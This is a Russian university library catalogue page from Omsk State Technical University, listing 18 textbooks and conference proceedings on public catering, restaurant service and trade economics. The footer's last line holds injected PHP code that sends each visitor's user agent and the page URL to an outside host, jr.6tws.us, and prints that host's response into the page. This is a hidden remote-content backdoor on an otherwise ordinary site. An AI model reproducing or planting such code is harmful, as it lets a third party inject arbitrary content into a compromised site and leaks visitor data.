Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

125 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 18
1. 
Артемова Е. Н. Основы технологии продукции общественного питания [Текст] : учеб. пособие для студентов высш. учеб. заведений / Е. Н. Артемова, 2008. - 331 с.
Ключевые слова 
ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- МЕНЮ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ПРОФИЛАКТИЧЕСКОЕ -- ПИТАНИЕ ДЕТЕЙ -- Питание работников умственного труда -- Питание работников физического труда -- КОНТРОЛЬ КАЧЕСТВА ПРОДУКЦИИ -- Контроль качества сырья -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- ПОЛУФАБРИКАТЫ овощные -- Полуфабрикаты кулинарных изделий -- Полуфабрикаты мучных изделий -- Норма выхода продукции -- Расчет расходов сырья
Держатели документа (Информация об экземплярах) 
2. 
Ахрапоткова Н. Б. Справочник официанта, бармена [Текст] : учеб. пособие для образоват. учреждений начального проф. образования / Н. Б. Ахрапоткова, 2005. - 270 с.
Ключевые слова 
ОФИЦИАНТ -- БАРМЕН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ОБОРУДОВАНИЕ ЗАЛА РЕСТОРАНА -- ОБОРУДОВАНИЕ БАРА -- ПОСУДА СТОЛОВАЯ -- ПОСУДА фарфоровая -- ПОСУДА фаянсовая -- ПОСУДА СТЕКЛЯННАЯ -- ПОСУДА металическая -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ИНВЕНТАРЬ для бара -- ПОДГОТОВКА ПРОФЕССИОНАЛЬНАЯ -- МЕТРДОТЕЛЬ -- СОМЕЛЬЕ -- ПРАВИЛА САНИТАРНЫЕ В ОБЩЕПИТ -- ПЕРСОНАЛ ОБСЛУЖИВАЮЩИЙ -- МЕНЮ -- КАРТА ВИН -- КАРТА коктейлей -- ВИНО ВИНОГРАДНОЕ -- ВИНО красное -- ВИНО белое -- ВИНО розовое -- ВИНО французское -- ВИНО итальянское -- ВИНО испанское -- ВИНО Германии -- ВИНО Португалии -- ВИНО Австралии -- ВИНО Новой Зеландии -- ВИНО Южной Африки -- ХЕРЕС -- ПОРТВЕЙН -- ВЕРМУТ -- МАДЕРА -- МАРСАЛА -- ВИНО ликерное -- ВИНО игристое -- ШАМПАНСКОЕ -- ВОДКА -- ВИСКИ -- КОНЬЯК -- БРЕНДИ -- ДЖИН -- РОМ -- ТЕКИЛА -- ЛИКЕР -- НАСТОЙКА -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ПИВО -- ЧАЙ -- КОФЕ -- ОБСЛУЖИВАНИЕ в зале ресторане -- ПОСЕТИТЕЛь ресторана -- РЕЗЕРВИРОВАНИЕ столиков -- НАПИТОК СМЕШАННЫЙ -- КОКТЕЙЛЬ -- ОБСЛУЖИВАНИЕ в баре -- ОБСЛУЖИВАНИЕ БАНКЕТНОЕ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ - ЧАЙ -- БАНКЕТ "буфет-коктейль" -- ОБСЛУЖИВАНИЕ туристов -- ТУР -- ПИТАНИЕ туристов -- СТОЛ ШВЕДСКИЙ -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЫНОК ресторанных услуг -- ТЕХНИКА БЕЗОПАСНОСТИ -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ -- ПОМОЩЬ ПЕРВАЯ МЕДИЦИНСКАЯ -- СЛОВАРЬ барных терминов -- СЛОВАРЬ дегустаторских терминов
Держатели документа (Информация об экземплярах) 
3. 
Панова Л. А. Организация производства на предприятиях общественного питания в экзаменационных вопросах и ответах [Текст] : учеб. пособие / Л. А. Панова, 2007. - 319 с.
Держатели документа (Информация об экземплярах) 
4. 
Экономика предприятий торговли и общественного питания [Текст] : учеб. пособие для студентов высш. учеб. заведений / под ред. Т. И. Николаевой, Н. Р. Егоровой, 2008. - 400 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
5. 
Фридман А. М. Экономика предприятий торговли и питания потребительского общества [Текст] : учебник / А. М. Фридман, 2008. - 625 с.
Держатели документа (Информация об экземплярах) 
6. 
Экономика отрасли: торговля и общественное питание [Текст] : учеб. пособие для студентов образоват. учреждений сред. проф. образования, 2009. - 221 с.
Держатели документа (Информация об экземплярах) 
7. 
Матюхина З. П. Основы физиологии питания, микробиологии, гигиены и санитарии [Текст] : учеб. для образоват. учреждений нач. проф. образования / З. П. Матюхина, 2007. - 206 с.
8. 
Экономика отрасли: торговля и общественное питание [Текст] : учеб. пособие для студентов образоват. учреждений сред. проф. образования, 2007. - 221 с.
Держатели документа (Информация об экземплярах) 
9. 
Никуленкова Т. Т. Проектирование предприятий общественного питания [Текст] : учеб. для студ. высш. учеб. заведений / Т. Т. Никуленкова, Г. М. Ястина, 2006. - 247 с.
Держатели документа (Информация об экземплярах) 
10. 
Голубев В. Н. Справочник работника общественного питания [Текст] : справочное издание / В. Н. Голубев, М. П. Могильный, Т. В. Шленская, 2003. - 589 с.
Держатели документа (Информация об экземплярах) 
11. 
Березкин И. В. Бухгалтерский учет на предприятиях общественного питания [Текст] : производственно-практическое издание / И. В. Березкин, 2003. - 267 с.
Держатели документа (Информация об экземплярах) 
12. 
Барановский В. А. Организация обслуживания на предприятиях общественного питания [Текст] : Учеб. пособие для студ. сред. спец. учеб. заведений / В. А. Барановский, 2004. - 350 с.
Держатели документа (Информация об экземплярах) 
13. 
Барановский В. А. Справочник официанта-бармена [Текст] : справочное издание / В. А. Барановский, 2003. - 221 с.
Держатели документа (Информация об экземплярах) 
14. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
15. 
Извекова В. Г. Бармен, официант [Текст] : учеб. пособие: соответствует Гос. образоват. стандарту РФ / В. Г. Извекова, 2004. - 319 с.
Ключевые слова 
ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ПРИБОР СТОЛОВЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- СКЛАД -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- СЕРВИЗНАЯ -- МЕНЮ -- КАРТА ВИН -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- КЕЙТЕРИНГ -- БАНКЕТ -- ПРИЕМ -- БУФЕТ -- БАР -- ДЕСЕРТ - БАР -- Пиво -- ПОСУДА стеклянная -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- РЕКЛАМА - РЕСТОРАН
Держатели документа (Информация об экземплярах) 
16. 
Сфера потребительских услуг: актуальные проблемы и перспективы развития [Текст] : материалы II Региональной науч.-практ. конференции, 27 апр. 2005 г. / М-во экономического развития и торговли РФ, Гос. образовательное учреждение высш. проф. образования "Красноярский гос. торгово-экон. ин-т", 2005. - 588 с.
Оглавление 
  • Александров, Ю. Л. Использование исторического опыта торговой деятельности в развитии экономики / Ю. Л. Александров. - с.11-19
    Кл. слова: ТОРГОВЛЯ - ИСТОРИЯ, ТОРГОВЛЯ - РОССИЯ
  • Терещенко, Н. Н. Тенденции и особенности развития рынка потребительских товаров и торгового предпринимательства Красноярского края / Н. Н. Терещенко. - с.20-58
    Кл. слова: РЫНОК ПОТРЕБИТЕЛЬСКИЙ РЕГИОН
  • Федорова, О. М. Исследование механизмов мотивации безработных граждан как фактор институционального развития потребительского рынка / О. М. Федорова, Т. А. Вашко. - с.59-71
    Кл. слова: МОТИВАЦИЯ ТРУДА, МОТИВАЦИЯ ТРУДОВАЯ
  • Алешина, О. Г. Государственное регулирование инфраструктуры товарного рынка / О. Г. Алешина. - с.72-79
    Кл. слова: РЫНОК ТОВАРНЫЙ
  • Бартакова, Т. С. Роль государства в структурных преобразованиях экономики / Т. С. Бартакова. - с.80-85
  • Батраева, Э. А. Роль и тенденции развития сферы услуг в современной экономике / Э. А. Батраева, И. В. Петрученя. - с.86-90
    Кл. слова: СФЕРА УСЛУГ - РОССИЯ
  • Бусаркина, В. В. Внутрифирменный рынок потребительских услуг: современные способы организации и регулирования / В. В. Бусаркина, С. В. Парамонова. - с.91-94
    Кл. слова: РЫНОК ПОТРЕБИТЕЛЬСКИЙ, УСЛУГИ ПОТРЕБИТЕЛЬСКИЕ
  • Васильева, И. В. Особенности развития рыночных отношений в системе высшего образования / И. В. Васильева. - с.95-99
    Кл. слова: ОБРАЗОВАНИЕ ВЫСШЕЕ - экономика
  • Вершняк, Л. Н. Свободная экономическая зона как инструмент перспектив развития территории / Л. Н. Вершняк. - с.99-107
    Кл. слова: ЗОНА ЭКОНОМИЧЕСКАЯ СВОБОДНАЯ, ПАРК ТЕХНОЛОГИЧЕСКИЙ
  • Дворяшина, М. М. К вопросу о потенциале развития ЖКХ / М. М. Дворяшина. - с.107-110
  • Демченко, С. К. Проблемы взаимосвязи потребления и накопления в российской экономике / С. К. Демченко. - с.110-114
  • Ерахтина, Л. Г. Современное состояние, государственное регулирование и перспективы развития сферы услуг по оценке собственности / Л. Г. Ерахтина. - с.115-119
  • Иоаниди, И. Ф. Состояние и развитие рынка услуг сотовой связи Красноярского края и факторов, его формирующих / И. Ф. Иоаниди, Н. Н. Терещенко. - с.120-131
    Кл. слова: РЫНОК СОТОВОЙ СВЯЗИ
  • Казаков, А. А. Характеристика и особенности потребления физкультурно-оздоровительных услуг населением г. Красноярска / А. А. Казаков. - с.112-137
  • Кошелева, И. В. Опыт реализации программы менеджмент-образования в Красноярском государственном торгово-экономическом институте / И. В. Кошелева, С. В. Здрестова-Захаренкова, И. В. Васильева. - с.137-143
    Кл. слова: ОБРАЗОВАНИЕ - МЕНЕДЖМЕНТ
  • Крылова, М. В. Проблемы ценообразования стоимости платного обучения на рынке образовательных услуг / М. В. Крылова. - с.143-147
    Кл. слова: УСЛУГИ ОБРАЗОВАТЕЛЬНЫЕ ПЛАТН
  • Купчигина, Т. В. Рынок потребительских услуг: опыт и проблемы современного этапа / Т. В. Купчигина. - с.148-152
    Кл. слова: РЫНОК ПОТРЕБИТЕЛЬСКИЙ, УСЛУГИ ПОТРЕБИТЕЛЬСКИЕ
  • Медведева, О. М. Совершенствование внешнего механизма регулирования предпринимательской деятельности / О. М. Медведева. - с.153-157
  • Медведева, Е. А. Эволюция и проблемы развития научной сферы в условиях рыночной экономики / Е. А. Медведева, Н. А. Соловьева. - с.157-168
    Кл. слова: НАУКА - ФИНАНСЫ, реформа науки - Россия
  • Остыловская, Л. А. О роли социальной инфраструктуры предприятий в развитии городской сферы потребительских услуг / Л. А. Остыловская, С. В. Парамонова. - с.168-171
    Кл. слова: ИНФРАСТРУКТУРА города
  • Парамонова, С. В. Роль социальной политики в развитии сферы потребительских услуг / С. В. Парамонова. - с.172-176
    Кл. слова: ПОЛИТИКА СОЦИАЛЬНАЯ
  • Петрученя, И. В. Изучение и анализ состояния розничной торговой сети, занимающейся реализацией чая и кофе в г. Красноярске / И. В. Петрученя, Э. А. Батраева. - с.177-187
    Кл. слова: РЫНОК ЧАЯ, рынок кофе
  • Плотникова, Н. Г. Вопросы разграничения уголовной ответственности за преступления в сфере потребительских услуг / Н. Г. Плотникова. - с.187-191
  • Подачина, Л. И. Изучение и анализ состояния общественного питания при высших учебных заведениях г. Красноярска / Л. И. Подачина. - с.204-213
    Кл. слова: ПИТАНИЕ СТУДЕНТОВ
  • Подачина, Л. И. Особенности развития общественного питания в современных условиях / Л. И. Подачина, Н. Н. Терещенко. - с.192-203
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ, Сибирь - питание общественное
  • Поклонова, Е. В. Услуги во внешнеэкономической деятельности Красноярского края / Е. В. Поклонова. - с.213-218
  • Пыжикова, А. В. Современные тенденции рынка пищевых красителей / А. В. Пыжикова, А. А. Ефремов. - с.219-222
    Кл. слова: КРАСИТЕЛЬ ПИЩЕВОЙ
  • Пузыня, К. Ф. Сущность и экономические проблемы развития социальной сферы России / К. Ф. Пузыня. - с.222-227
  • Сергеева, И. И. Технология маркетинга отношений организаций культуры с инвесторами / И. И. Сергеева, А. Жираткова. - с.227-231
  • Сочнева, Е. Н. Коммерческая деятельность на рынке образовательных услуг / Е. Н. Сочнева. - с.231-235
    Кл. слова: УСЛУГИ ОБРАЗОВАТЕЛЬНЫЕ ПЛАТН, РЫНОК ОБРАЗОВАТЕЛЬНЫХ УСЛУГ
  • Тарасова, О. М. Методические аспекты организации научно-исследовательской работы / О. М. Тарасова. - с.235-240
    Кл. слова: РАБОТА НАУЧНО-ИССЛЕДОВАТЕЛЬС, НИР
  • Терещенко, Н. Н. Сравнительная характеристика рынка образовательных услуг в системе высшего образования России и Красноярского края / Н. Н. Терещенко, Е. В. Титова. - с.240-255
    Кл. слова: РЫНОК ОБРАЗОВАТЕЛЬНЫХ УСЛУГ, УСЛУГИ ОБРАЗОВАТЕЛЬНЫЕ
  • Федорова, О. М. Особенности формирования рынка лесной продукции края в 1999-2002 гг. / О. М. Федорова. - с.255-263
    Кл. слова: КОМПЛЕКС ЛЕСОПРОМЫШЛЕННЫЙ
  • Шемякина, М. С. Тенденции развития рынка банковских услуг / М. С. Шемякина. - с.264-269
    Кл. слова: РЫНОК БАНКОВСКИХ УСЛУГ, УСЛУГИ БАНКОВСКИЕ
  • Бутова, Т. Г. Подходы к формированию регионального потребительского комплекса / Т. Г. Бутова, И. В. Бушуева. - с.280-286
    Кл. слова: комплекс потребительский
  • Иващенко, Г. П. Организация сбыта и формирование ассортимента пива на потребительском рынке г. Минусинска / Г. П. Иващенко. - с.291-294
    Кл. слова: РЫНОК ПИВА
  • Перевозова, В. А. Организация, изучение и прогнозирование спроса потребителей на рынке молока и молочной продукции г. Минусинска / В. А. Перевозова. - с.295-298
    Кл. слова: рынок молока, МОЛОКО - ТОРГОВЛЯ
  • Перевозова, В. А. Развитие потребительского рынка хлеба и хлебобулочных изделий в г. Минусинске / В. А. Перевозова, Г. П. Иващенко. - с.298-302
    Кл. слова: РЫНОК ХЛЕБНЫХ ИЗДЕЛИЙ
  • Суслова, Ю. Ю. Основные подходы к определению рыночной инфраструктуры в современных условиях / Ю. Ю. Суслова. - с.307-311
    Кл. слова: ИНФРАСТРУКТУРА РЫНОЧНАЯ
  • Суслова, Ю. Ю. Особенности развития инфраструктуры регионального рынка потребительских товаров и услуг / Ю. Ю. Суслова. - с.311-316
    Кл. слова: РЫНОК ПОТРЕБИТЕЛЬСКИЙ, ИНФРАСТРУКТУРА РЫНОЧНАЯ
  • Астраханцева, И. А. Анализ подходов к формированию моделей управления компанией / И. А. Астраханцева. - с.341-345
  • Боенко, Н. И. Теория человеческого капитала, концепция человеческого развития и их значение в экономике / Н. И. Боенко. - с.346-353
    Кл. слова: КАПИТАЛ ЧЕЛОВЕЧЕСКИЙ
  • Вашко, Т. А. Миссия - вершина иерархической пирамиды элементов стратегического выбора / Т. А. Вашко. - с.353-360
    Кл. слова: МИССИЯ ОРГАНИЗАЦИИ
  • Вингерт, В. В. Управление конкурентной средой регионального рынка ликероводочной продукции Красноярского края / В. В. Вингерт. - с.361-370
  • Еременко, Н. М. Основы системы управления активами и пассивами российского банка в условиях нестабильной экономики / Н. М. Еременко, И. А. Янкина. - с.371-379
  • Еременко, Н. М. Развитие теории управления активами и пассивами банка в условиях нестабильной экономики / Н. М. Еременко, И. А. Янкина. - с.380-386
  • Костяшкина, О. Г. Рентабельность банковских услуг как теоретическая и практическая концепция управления кредитной организацией / О. Г. Костяшкина. - с.394-404
    Кл. слова: УСЛУГИ БАНКОВСКИЕ
  • Костяшкина, О. Г. Информационное обеспечение комплексной системы управления рентабельностью коммерческого банка / О. Г. Костяшкина, И. Н. Коюпченко. - с.404-420
    Кл. слова: РЕНТАБЕЛЬНОСТЬ БАНКА
  • Чаплина, А. Н. Концепция управления потребительским рынком для населения России / А. Н. Чаплина, Е. А. Герасимова. - с.420-440
  • Владимирова, О. Н. Жилищные накопительные и кредитные потребительские кооперативы граждан в рамках ипотечного кредитования / О. Н. Владимирова. - с.450-454
    Кл. слова: КООПЕРАТИВ ЖИЛИЩНЫЙ
  • Глубокова, Л. Г. Современные подходы к классификации расходов предприятий торговли для целей управления / Л. Г. Глубокова. - с.454-465
  • Гендых, Н. Н. Виды ограничений в деятельности предприятий общественного питания / Н. Н. Гендых. - с.465-472
    Кл. слова: ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ
  • Емельянова, О. Н. Оценка экономической эффективности деятельности предприятий торговли / О. Н. Емельянова. - с.472-475
  • Здрестова-Захаренкова, С. В. Формирование и внедрение системы контроллинга на предприятии: теоретический аспект / С. В. Здрестова-Захаренкова. - с.475-483
  • Коробова, Т. В. Реальный сектор экономики и коммерческие банки: пути их взаимодействия / Т. В. Коробова. - с.483-489
  • Костяшкина, О. Г. Рентабельность банковской услуги как компонента комплексной системы управления рентабельностью кредитной организации / О. Г. Костяшкина. - с.489-499
    Кл. слова: УСЛУГИ БАНКОВСКИЕ
  • Маслова, Н. В. Агентство по реструктуризации кредитных организаций - особый субъект кредитной системы / Н. В. Маслова, И. А. Янкина. - с.500-503
  • Маслова, Н. В. Государственные банки в банковской системе России / Н. В. Маслова, И. А. Янкина. - с.504-508
    Кл. слова: БАНК ГОСУДАРСТВЕННЫЙ
  • Пакшина, Т. П. Обоснование места внутреннего аудита в системе внутрихозяйственного контроля / Т. П. Пакшина. - с.509-516
    Кл. слова: АУДИТ ВНУТРЕННИЙ
  • Рукосуева, Т. В. Подходы к системе оценке деятельности предприятий общественного питания / Т. В. Рукосуева. - с.516-519
    Кл. слова: ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ
  • Савина, А. В. Варианты расчета базовых цен при ценообразовании по рейтингам на региональном рынке телерекламы / А. В. Савина. - с.520-524
    Кл. слова: РЕКЛАМА - ЦЕНООБРАЗОВАНИЕ
  • Смирнова, А. М. Изучение и оценка организации оплаты труда в сфере розничной торговли / А. М. Смирнова. - с.525-537
    Кл. слова: ОПЛАТА ТРУДА - ТОРГОВЛЯ
  • Титова, Е. В. Изучение и оценка состояния материального стимулирования труда работников торговли / Е. В. Титова, Н. Н. Терещенко. - с.544-551
    Кл. слова: ОПЛАТА ТРУДА - ТОРГОВЛЯ
  • Урустемова, Г. К. Применение системы "директ-костинг" в целях повышения эффективности работы розничных торговых предприятий / Г. К. Урустемова. - с.552-554
    Кл. слова: ДИРЕКТ - КОСТИНГ
  • Янкина, И. А. Проблемы сопряженности денежно-кредитной и инвестиционной политики в России / И. А. Янкина, О. А. Мотороева. - с.567-576
    Кл. слова: ПОЛИТИКА ДЕНЕЖНО-КРЕДИТНАЯ, ПОЛИТИКА ИНВЕСТИЦИОННАЯ - РО
  • Янкина, И. А. Интерполяция категории "кредит" для эффективности и сопряженности кредитно-денежной и банковской политик / И. А. Янкина. - с.576-588
Держатели документа (Информация об экземплярах) 
17. 
Могильный М. П. Организация и технология обслуживания питанием в гостиничных комплексах (рекомендации, перспективы, проектирование) [Текст] : производственно-практическое издание / М. П. Могильный, А. Ю. Баласанян, 2004. - 176 с.
Ключевые слова 
БАД -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- ХОЗЯЙСТВО ГОСТИНИЧНОЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- СЕРВИС -- VIP - обслуживание -- МЕНЮ -- ТУРИЗМ молодежный -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- ПИТАНИЕ ИНТУРИСТОВ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ БОЛГАРСКАЯ -- КУХНЯ ВЕНГЕРСКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ ИНДИЙСКАЯ -- КУХНЯ КОРЕЙСКАЯ -- КУХНЯ МЕКСИКАНСКАЯ -- КУХНЯ МОНГОЛЬСКАЯ -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ПОЛЬСКАЯ -- КУХНЯ РУМЫНСКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ЧЕШСКАЯ -- КУХНЯ СЛОВАЦКАЯ -- КУХНЯ ЮГОСЛАВСКАЯ -- КУХНЯ ЯПОНСКАЯ -- Кухня арабская -- Кухня Юго-Восточной Азии -- Кухня кубинская -- Кухня стран Латинской Америки -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- КУХНЯ НАЦИОНАЛЬНАЯ -- День разгрузочный
Держатели документа (Информация об экземплярах) 
18. 
Кавецкий, Георгий Дмитриевич. Оборудование предприятий общественного питания [Текст] : Уч.пособие гриф-МО / Г. Д. Кавецкий, О. К. Филатов, Т. В. Шленская, 2004. - 308 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3104 - 09.12.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.81 с.12 запросов, 0.62c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;